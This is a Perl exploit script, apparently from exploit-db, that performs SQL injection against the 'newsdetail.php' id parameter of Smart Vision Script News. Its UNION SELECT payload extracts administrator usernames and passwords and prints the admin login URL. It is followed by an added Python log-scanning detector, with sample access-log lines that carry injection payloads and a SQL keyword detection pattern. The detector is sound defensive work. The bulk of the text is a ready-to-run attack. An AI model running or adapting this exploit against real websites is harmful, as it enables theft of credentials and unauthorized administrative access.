#!/usr/bin/perl
############################################################################
# Exploit Title: Smart Vision Script News (newsdetail) SQL Injection Exploit
# Date: 01-04-2010
# Author: darkmasking
############################################################################
# This was written for educational purposes only. Use it at your own risk.
# The author will not be responsible for any damage!
############################################################################
# Vuln discovered by Err0R
# Smart Vision Script News ( newsdetail ) SQL Injection Vulnerability
# http://www.exploit-db.com/exploits/10977
############################################################################
# Greetz : sorry bro, no friends around yet, so this one is just for me 0_o
############################################################################

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

sub banner {
    print "\n".
    "[»]=============================================[_][-][X]\n".
    "[»]======= ------d-------m------ ========             [»]\n".
    "[»]|| === = | |(o o)| |||== || ==||                   [»]\n".
    "[»]|| === = ||(~)|||| == ||                           [»]\n".
    "[»]======= | ||||                                     [»]\n".
    "[»]---------------------------------------------------[»]\n".
    "[»]      Smart Vision Script News (newsdetail)        [»]\n".
    "[»]             SQL Injection Exploit                 [»]\n".
    "[»]                                     by darkmasking[»]\n".
    "[»]                            Vuln discovered by Err0R[»]\n".
    "[»]===================================================[»]\n\n";
}

my $host       = $ARGV[0];
my $sql_path   = "/newsdetail.php?id=";
my $admin_path = "/admin/admin.php";

if (@ARGV < 1) {
    banner();
    help(-1);
}
elsif (check($host) == 1) {
    banner();
    dmploit($host, $sql_path);
}
else {
    banner();
    help(-2);
}

# Send the injected request and look for the marker-delimited result.
sub dmploit {
    my $host     = $_[0];
    my $sql_path = $_[1];
    print "[+] Getting Username and Password\n";
    print "[!] Checking...\n";
    print "\n";
    my $sql_atk = $host.$sql_path."-9999 union select null,concat(0x6461726b6d61736b696e67,0x3a,user_name,0x3a,password,0x3a,0x6461726b6d61736b696e67),null,null,null,null,null from zagrosle_zagros.user_accounts--";
    my $sql_get = get_url($sql_atk);
    my $connect = tag($sql_get);
    if ($connect =~ /darkmasking:(.+):(.+):darkmasking/) {
        print "-o0 SQL Injection Successfully 0o-\n";
        print "[+] Username : $1\n";
        print "[+] Password : $2\n";
        print "\n";
        print "[+] Admin URL = $host$admin_path\n";
    }
    else {
        print "[-] SQL Injection Failed\n";
    }
}

# Fetch a URL and return the response body (5 second timeout).
sub get_url {
    my $link = $_[0];
    my $req  = HTTP::Request->new(GET => $link);
    my $ua   = LWP::UserAgent->new();
    $ua->timeout(5);
    my $response = $ua->request($req);
    return $response->content;
}

# Replace whitespace so the marker pattern matches across line breaks.
sub tag {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
}

# Accept only targets given as an http:// URL.
sub check {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub help {
    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }
    elsif ($error == -2) {
        print "\n[-] Error, Bad arguments !\n";
    }
    print " Usage : perl $0 http://www.darkurl.com/\n\n";
    print " Ex: perl $0 http://www.darkurl.com/\n\n";
    exit(0);
}
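The request this script sends shows up in the web server access log as a request to newsdetail.php whose id parameter is not a plain number. The following added example (not part of the exploit-db listing, and not code from the script's author or the Smart Vision Script News project) scans constructed Common Log Format lines for exactly that: it flags any id value that is not purely numeric, which is also the check the vulnerable script should have applied before building its query.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (not captured from any real server):
# one benign request, two probes against the newsdetail.php id parameter,
# and one unrelated request.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Apr/2010:10:00:01 +0000] "GET /newsdetail.php?id=42 HTTP/1.1" 200 5120
203.0.113.11 - - [01/Apr/2010:10:00:02 +0000] "GET /newsdetail.php?id=-9999%20union%20select%20null,concat(0x3a,user_name),null%20from%20user_accounts-- HTTP/1.1" 200 612
203.0.113.12 - - [01/Apr/2010:10:00:03 +0000] "GET /newsdetail.php?id=7%27%20or%201=1 HTTP/1.1" 200 5120
203.0.113.13 - - [01/Apr/2010:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

# Common Log Format: client ip, ident, user, [timestamp], "METHOD target proto"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')
# The vulnerable page expects a numeric id; anything else is worth a look.
NUMERIC_ID = re.compile(r'^\d+$')
# Coarse SQL keyword signature used only to label non-numeric values for triage.
SQL_HINT = re.compile(r"(union\s+select|\bor\b\s+\d+=\d+|concat\(|--|')", re.IGNORECASE)

def parse_line(line):
    """Return (ip, path, query dict) for one log line, or None if unparsable."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    return m.group('ip'), parts.path, parse_qs(parts.query, keep_blank_values=True)

def classify_id(value):
    """Return None for a well-formed numeric id, else a short reason string."""
    decoded = unquote_plus(value)
    if NUMERIC_ID.match(decoded):
        return None
    if SQL_HINT.search(decoded):
        return 'sql-keywords'
    return 'non-numeric'

def find_suspicious(log_text):
    """List (ip, reason) for every newsdetail.php request with a bad id value."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, path, qs = parsed
        if path != '/newsdetail.php':
            continue
        for value in qs.get('id', []):
            reason = classify_id(value)
            if reason:
                hits.append((ip, reason))
    return hits
```

Run over real logs, the numeric check is the reliable part; the keyword hint only orders the review, since an id of "abc" is just as much a sign of tampering as one containing SQL.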